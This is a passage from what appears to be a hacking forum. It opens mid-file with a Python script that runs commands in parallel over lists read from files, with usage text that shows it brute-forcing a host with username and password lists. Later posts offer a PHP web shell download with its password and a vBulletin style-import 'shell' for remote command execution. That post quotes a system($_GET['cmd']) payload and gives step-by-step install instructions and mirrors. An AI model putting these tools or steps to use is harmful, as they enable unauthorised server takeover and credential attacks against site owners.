Engine(Thread): """ Execute each command in a separate thread and listen for it's output. """ def __init__(self, command): super(Engine, self).__init__() # superclass constructor self.command = command def run(self): """ Function called from outside by `start` method. """ # fork the fucking process pobj = subprocess.Popen(self.command.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT) # listen for new input while True: line = pobj.stdout.readline() if line == "": # more output it's about to come if pobj.poll() != None: # nope break # so exit continue # try again report.write(line) # globals usage = """ Usage: {0} [options] command Options: -t, --threads <int> how many asynchronous threads to run -d, --delay <float> time in seconds to wait between each run -f, --file <str> write output to file too Commands: <any valid command> ex: wget {1}links.txt If you preceed a parameter with {1} it becomes a list with parameters taken from a file called like itself. Old: ./scan -h 91.202.91.119 -u usr.txt -p pwd.txt New: {0} ./scan -h {1}hosts.txt -u usr.txt -p pwd.txt """.format(argv[0], CHAR) report = Show() # make verbose object def generate(command, expand, pos): """ Format command recursively. """ if pos == len(expand): # now command string is complete sleep(DLAY) # delay while active_count() > THRD: pass # wait if number of threads is exceeded report.write("[+] Start: %s\n" % command) Engine(command).start() return expand[pos].seek(0) # rewind for line in expand[pos]: generate(command.replace("{%d}" % pos, line.strip()), expand, pos + 1) def main(): global FILE, THRD, DLAY, CHAR # check if len(argv) == 1 or argv[1] in ('-h', "--help"): print usage return # insuficient parameters # parse report.write("[+] Parsing...\n") argv.pop(0) # remove script name command = "" ind = 0 # index expand = [] # list with special parameters while ind < len(argv): if argv[ind] in ('-t', "--threads"): ind += 1 THRD = int(argv[ind]) elif argv[ind] in ('-d', "--delay"): ind += 1 DLAY = float(argv[ind]) elif argv[ind] in ('-f', "--file"): ind += 1 FILE = argv[ind] report.open_file(FILE) elif argv[ind][0] == CHAR: # reserve variable parameter for special ones command += ' ' + "{%d}" % (len(expand)) # add to list special parameters (`CHAR`<smth>) expand.append(open(argv[ind][1:], 'r')) # file objects else: command += ' ' + argv[ind] ind += 1 # process report.write("[+] Processing...\n") generate(command.strip(), expand, 0) while active_count() > 1: pass # wait for running threads report.write("[+] Done.\n") if __name__ == "__main__": main() Updated: 14.02.2012
  15. Edited. Download Link: shell.txt Puteti schimba parola aici:--> @ $auth_pass = "DE65C26EE56EC4B20A6E86A1D7BB2BC5"; Parola este criptata in md5. Default pass: pgems.in Sursa: HackForums
  16. By TinKode Why I created this (XML) Shell for vBulletin?! Hmm, because it's more easy to use and work on all versions from 3.X to 4.X. I removed all PHP codes, because vB 4.X had restricted these tags. The old method to edit a file like ajax.php to make RCE [Remote Command Execution] and to add a code in source like <?php system($_GET['cmd']);?> and to execute like http://website.com/ajax.php?cmd=[RCE] Now doesn't work on the 4.X versions! Instructions: Step 1: Enter on AdminCP -> Styles & Templates section and choose Download / Upload Styles. Step 2: Click on Browse button and search insecurity.xml, and after select [Yes] Ignore Style Version, then click Import. Step 3: After you have uploaded the .XML Style, you can access by clicking on the style like in the example. IMGS Downloads: Mirror: http://pastebin.com/ybZqXiDH Mirror: http://www.megaupload.com/?d=5DELFLQ3 Password: ISR
×
×
  • Create New...